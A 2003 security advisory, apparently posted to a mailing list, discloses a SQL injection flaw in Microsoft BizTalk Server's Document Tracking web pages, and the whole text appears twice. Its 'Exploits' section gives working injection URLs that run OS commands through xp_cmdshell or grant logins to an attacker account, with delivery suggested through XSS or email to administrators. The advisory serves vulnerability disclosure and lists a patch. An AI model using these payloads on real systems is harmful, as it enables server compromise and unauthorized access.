Cesar
05/05/03, 23:20
Security Advisory
Name: Microsoft Biztalk Server Document Tracking and
Admnistration vulnerable to SQL injection
System Affected : BizTalk Server 2000 and BizTalk
Server 2002
Severity : High
Remote exploitable : Yes
Author: Cesar Cerrudo.
Date: 05/05/03
Advisory Number: CC040302
Legal Notice:
This Advisory is Copyright (c) 2003 Cesar Cerrudo.
You may distribute it unmodified and for free. You may
NOT modify it and distribute it or distribute parts of
it without the author's written permission. You may
NOT use it for commercial intentions (this means
include it in vulnerabilities databases,
vulnerabilities scanners, any paid service, etc.)
without the author's written permission. You are free
to use Microsoft bulletin's details for commercial
intentions.
Disclaimer:
The information in this advisory is believed to be
true though it may be false.
The opinions expressed in this advisory are my own and
not of any company. The usual standard disclaimer
applies, especially the fact that Cesar Cerrudo is not
liable for any damages caused by direct or indirect
use of the information or functionality provided by
this advisory. Cesar Cerrudo bears no responsibility
for content or misuse of this advisory or any
derivatives thereof.
Overview:
Microsoft Biztalk Server is a Microsoft product for
business-process automation
and application-integration both within and between
businesses. BizTalk Server
provides a powerful Web-based development and
execution environment that integrates
loosely coupled, long-running business processes, both
within and between companies.
BizTalk Server features include integration among
existing applications; the definition
of document specifications and specification
transformations; and the monitoring and
logging of run-time activity. The server provides a
standard gateway for sending and
receiving documents across the Internet, as well as
providing a range of services that
ensure data integrity, delivery, security, and support
for the BizTalk Framework and
other key document formats.
Microsoft BizTalk Server provides the ability for
administrators to manage documents via
a Document Tracking and Administration (DTA) web
interface. A SQL Injection vulnerability
exists in some of the pages used by DTA that could
allow an attacker to send a crafted URL
query string to a legitimate DTA user and to execute a
malicious embedded SQL statement in
the query string.
Details:
BizTalk Document Tracking and Administration is a
stand-alone Web application that you can use to
view interchanges and documents that you configured to
be tracked in Microsoft
BizTalk Server. Biztalk Server uses SQL Server as a
backend database server.
Only members of Windows administrators or BizTalk
Server Report Users local groups
are granted by default to use Biztalk Document
Tracking and Administration user interface and view
tracked documents.
The web application authenticate users by Windows
authentication, the credentials are
also used to authenticate to SQL Server. The web
application is located at:
http://server/biztalktracking/
There are two ASP pages on the web application that
connect from server side to SQL
Server that are vulnerable to SQL injection:
http://server/biztalktracking/rawdocdata.asp
http://server/biztalktracking/RawCustomSearchField.asp
Exploits:
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec
master.dbo.xp_cmdshell 'any OS command'--
http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirecti on=1;exec
master.dbo.xp_cmdshell 'any OS command'--
or
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec
master.dbo.sp_grantlogin 'domain\attacker'--
http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirecti on=1;exec
master.dbo.sp_grantlogin 'domain\attacker'--
....etc.
There are others ASP and HTML pages in the Web
application that connect to SQL Server
with activex components from client side that are also
vulnerable to SQL injection.
But when a user access these pages a warning message
is displayed by Internet Explorer
with default security settings for Intranet Zone:
"This page access data on another domain. Do you want
to allow this"
Making the explotation harder without alarming the
targeted administrators.
This vulnerability can be exploited throght XSS or
sending an administrator
an HTML e-mail, etc. targeting the vulnerable server.
Explotation of this vulnerability allows an attacker
to complete compromise
SQL Server and could lead to further OS compromise.
Workaround:
Edit ASP and HTML source files to filter malicious
input.
Vendor Status :
Microsoft was contacted 02/14/03, we work together and
Microsoft released a fix.
Patch Available :
http://www.microsoft.com/technet/security/bulletin/MS03-016.asp
NEW SECURITY LIST!!!: For people interested in SQL
Server security, vulnerabilities, SQL injection, etc.,
I'm starting a new mailing list.
People subscribed to the list received this advisory
five days ago!!.
Join at:
sqlserversecurity-subscribe@yahoogroups.com
http://groups.yahoo.com/group/sqlserversecurity/
__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com
Name: Microsoft Biztalk Server Document Tracking and
Admnistration vulnerable to SQL injection
System Affected : BizTalk Server 2000 and BizTalk
Server 2002
Severity : High
Remote exploitable : Yes
Author: Cesar Cerrudo.
Date: 05/05/03
Advisory Number: CC040302
Legal Notice:
This Advisory is Copyright (c) 2003 Cesar Cerrudo.
You may distribute it unmodified and for free. You may
NOT modify it and distribute it or distribute parts of
it without the author's written permission. You may
NOT use it for commercial intentions (this means
include it in vulnerabilities databases,
vulnerabilities scanners, any paid service, etc.)
without the author's written permission. You are free
to use Microsoft bulletin's details for commercial
intentions.
Disclaimer:
The information in this advisory is believed to be
true though it may be false.
The opinions expressed in this advisory are my own and
not of any company. The usual standard disclaimer
applies, especially the fact that Cesar Cerrudo is not
liable for any damages caused by direct or indirect
use of the information or functionality provided by
this advisory. Cesar Cerrudo bears no responsibility
for content or misuse of this advisory or any
derivatives thereof.
Overview:
Microsoft Biztalk Server is a Microsoft product for
business-process automation
and application-integration both within and between
businesses. BizTalk Server
provides a powerful Web-based development and
execution environment that integrates
loosely coupled, long-running business processes, both
within and between companies.
BizTalk Server features include integration among
existing applications; the definition
of document specifications and specification
transformations; and the monitoring and
logging of run-time activity. The server provides a
standard gateway for sending and
receiving documents across the Internet, as well as
providing a range of services that
ensure data integrity, delivery, security, and support
for the BizTalk Framework and
other key document formats.
Microsoft BizTalk Server provides the ability for
administrators to manage documents via
a Document Tracking and Administration (DTA) web
interface. A SQL Injection vulnerability
exists in some of the pages used by DTA that could
allow an attacker to send a crafted URL
query string to a legitimate DTA user and to execute a
malicious embedded SQL statement in
the query string.
Details:
BizTalk Document Tracking and Administration is a
stand-alone Web application that you can use to
view interchanges and documents that you configured to
be tracked in Microsoft
BizTalk Server. Biztalk Server uses SQL Server as a
backend database server.
Only members of Windows administrators or BizTalk
Server Report Users local groups
are granted by default to use Biztalk Document
Tracking and Administration user interface and view
tracked documents.
The web application authenticate users by Windows
authentication, the credentials are
also used to authenticate to SQL Server. The web
application is located at:
http://server/biztalktracking/
There are two ASP pages on the web application that
connect from server side to SQL
Server that are vulnerable to SQL injection:
http://server/biztalktracking/rawdocdata.asp
http://server/biztalktracking/RawCustomSearchField.asp
Exploits:
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec
master.dbo.xp_cmdshell 'any OS command'--
http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirecti on=1;exec
master.dbo.xp_cmdshell 'any OS command'--
or
http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec
master.dbo.sp_grantlogin 'domain\attacker'--
http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirecti on=1;exec
master.dbo.sp_grantlogin 'domain\attacker'--
....etc.
There are others ASP and HTML pages in the Web
application that connect to SQL Server
with activex components from client side that are also
vulnerable to SQL injection.
But when a user access these pages a warning message
is displayed by Internet Explorer
with default security settings for Intranet Zone:
"This page access data on another domain. Do you want
to allow this"
Making the explotation harder without alarming the
targeted administrators.
This vulnerability can be exploited throght XSS or
sending an administrator
an HTML e-mail, etc. targeting the vulnerable server.
Explotation of this vulnerability allows an attacker
to complete compromise
SQL Server and could lead to further OS compromise.
Workaround:
Edit ASP and HTML source files to filter malicious
input.
Vendor Status :
Microsoft was contacted 02/14/03, we work together and
Microsoft released a fix.
Patch Available :
http://www.microsoft.com/technet/security/bulletin/MS03-016.asp
NEW SECURITY LIST!!!: For people interested in SQL
Server security, vulnerabilities, SQL injection, etc.,
I'm starting a new mailing list.
People subscribed to the list received this advisory
five days ago!!.
Join at:
sqlserversecurity-subscribe@yahoogroups.com
http://groups.yahoo.com/group/sqlserversecurity/
__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com